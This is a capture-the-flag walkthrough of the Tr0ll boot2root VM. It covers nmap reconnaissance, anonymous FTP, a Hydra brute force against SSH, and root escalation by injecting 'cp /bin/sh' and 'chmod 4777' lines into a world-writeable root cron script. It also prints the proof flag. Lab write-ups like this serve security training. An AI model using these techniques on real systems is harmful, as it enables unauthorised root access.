Tr0ll is a boot2root, from Maleus. It was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!
[email protected]:~# nmap -n -A -p- 192.168.127.103 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 10 00:43 lol.pcap [NSE: writeable] 22/tcp open ssh (protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) |_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/secret |_http-title: Site doesn't have a title (text/html).
Starting from the top, anonymous FTP login is permitted and Nmap has listed the root directory. I logged in manually and downloaded
[email protected]:~/vuln/tr0ll# strings lol.pcap [...snip...] W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes). WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P Sucks, you were so close... gotta TRY HARDER!
Having a look around the Apache service reveals a few friendly images.
Other tools such as
nikto didn’t turn up anything more. After a little pondering I decided to try
sup3rs3cr3tdirlol as a directory in the URL, and was presented with the following page:
roflmao which turned out to be a binary file, which doesn’t appear to do anything more than print the following message:
Find address 0x0856BF to proceed
This has the potential to send you on a massive goose chase, but I was now thinking like a proper troll :p. Address… Web address…?
Heh, nice. These directories contain the following files:
Index of /0x0856BF/good_luck [TXT] which_one_lol.txt 2014-08-09 23:32 109 maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
Index of /0x0856BF/this_folder_contains_the_password [TXT] Pass.txt 2014-08-09 23:18 12 Good_job_:)
I took the list in
which_one_lol.txt and used it as potential usernames, and the string
Good_job_:) as a password. I then ran this through
Hydra to try my luck against SSH. Unfortunately, it seems that after about 7-8 incorrect logins, the SSH service closes for a while before coming back up.
Hydra doesn’t seem to save its session when this happens, so carrying on after the service comes back up didn’t seem possible. To this end, I just tried the logins manually, since there weren’t actually that many.
However, this password was not valid for any of these accounts :(
More trolls however - if we recall the name of the directory,
this_folder_contains_the_password. What’s in that folder?
Pass.txt. Try the filename as a password…?
I finally got a successful login with
I started some basic enumeration until this happened:
Broadcast Message from [email protected] (somewhere) at 9:20 ... TIMES UP LOL! Connection to 192.168.127.103 closed by remote host.
Oh for God sake, haha - this seems to happen every five minutes or so, but you can just reconnect each time.
I got a hit whilst searching for world-writeable files.
find / -perm -0002 -type f -print [...snip...] /lib/log/cleaner.py -rwxrwxrwx 1 root root 96 Aug 13 00:13 /lib/log/cleaner.py
A world-writeable script owned by root? Jackpot (rasta_mouse braces himself for more trolls)…
#!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit()
I simply added two new lines to this.
os.system('cp /bin/sh /tmp/sh') os.system('chmod 4777 /tmp/sh')
I waited a few minutes and eventually my shell turned up!
-rwxrwxrwx 1 root root 112204 Aug 29 10:31 sh
# id uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow) # whoami root
From here, you can cat the flag.
# cat root/proof.txt Good job, you did it! 702a8c18d29c6f3ca0d99ef5712bfbdc
I also wanted to take a look at the automated processes going on, so here they are.
*/5 * * * * /usr/bin/python /opt/lmao.py */2 * * * * /usr/bin/python /lib/log/cleaner.py
#!/usr/bin/env python import os os.system('echo "TIMES UP LOL!"|wall') os.system("pkill -u 'overflow'") sys.exit()